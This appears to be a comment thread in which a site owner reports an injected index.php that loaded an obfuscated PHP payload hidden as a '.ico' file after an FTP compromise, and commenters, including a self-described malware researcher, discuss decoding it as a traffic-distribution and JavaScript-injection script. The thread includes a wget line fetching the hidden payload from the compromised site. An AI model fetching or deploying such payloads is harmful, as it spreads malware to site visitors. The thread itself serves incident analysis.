So I found the below piece of code in my webhost account, it was smart enough to overwrite my default index.html and replaced it with index.php containing the below code which got executed each time someone hit the website without showing any signs of hacks to the end user.
Turns out my ftp username was compromised so thats how it found its way however I trying to decode and make sense of what exactly it does.
no idea what the ade56 is all about?
maybe it’s supposed to be a clever algo cloaking the actual #include…
wget eddywebs.com/password-generator/css/.d40df8b5.ico > sample
gives us a some weird ass php code. looks ‘encrypted’ with some number2character mapping…
Hi there! Thanks for a fun challenge! I’m sharing here the clear-text code in its final stage
As a malware researcher, I encounter tons of examples as this. My main method is to clean the noise and let the malicious code to decrypt itself. If there’ll be a request I’ll write you a write-up of how I did it and why I did every step.
So what we have here?
Seems like an implementation of a TDS Client and an injection of a Javascript code to the browser. This is just an assumption from a quick read of the keywords.
I honestly didn’t read the code once I got to the final stage of a clear-text + commented code.
The next is for you as an exercise
You can try, for example, to decrypt the encoded config data.
Hi guys just got this @ricksanchez the file seems to be introduced on Aug 14 in webserver and is not in original src code.
Here was what I found in server using ls -la,
I will contact the sys admins to see find out any more info. About the actual contents of .ico file I guess smart folks here have already figured that out.